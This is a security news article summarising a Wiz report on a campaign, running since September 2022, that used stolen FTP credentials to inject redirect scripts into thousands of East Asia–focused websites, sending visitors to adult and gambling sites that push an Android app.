Since the beginning of September 2022, thousands of websites targeted at East Asian audiences have been compromised by a large-scale malicious cyber operation that directs users to adult-themed content. The continuing attack involves connecting to the target web server using valid FTP credentials that the threat actor had previously obtained via an undisclosed manner, then inserting malicious JavaScript code into the compromised websites.
“In many cases, these were highly secure auto-generated FTP credentials which the attacker was somehow able to acquire and leverage for website hijacking,” Wiz said in a recently-published report.
The cloud security company stated that it has been challenging to identify a common attack vector since the compromised websites—owned by both small businesses and large corporations – use various tech stacks and hosting service providers. After all of that, one of the things websites have in common is that most of them are either hosted in China or are hosted in another nation but are optimized for Chinese users.
Additionally, the geofenced URLs housing the malicious JavaScript code prevent its execution in specific East Asian nations. There are additional hints that the campaign is targeting Android since the redirection script sends users to gambling websites where they are urged to download an app (APK package name “com.tyc9n1999co.coandroid“).
Although the threat actor’s identity is currently unknown and their exact objectives have not been established, it is believed that they are attempting to engage in ad fraud and SEO manipulation or, alternatively, send inorganic traffic to these websites. The attacks’ lack of phishing, online skimming, or malware infection is another noteworthy feature.
Researchers Amitai Cohen and Barak Sharoni said they are still unaware of how the threat actor has been getting initial access to so many websites. They have not yet found any notable similarities among the compromised servers besides the fact that they all use FTP. Given the attack’s apparent lack of complexity, it is doubtful that the threat actor is employing a 0-day vulnerability, but they can’t completely rule it out.
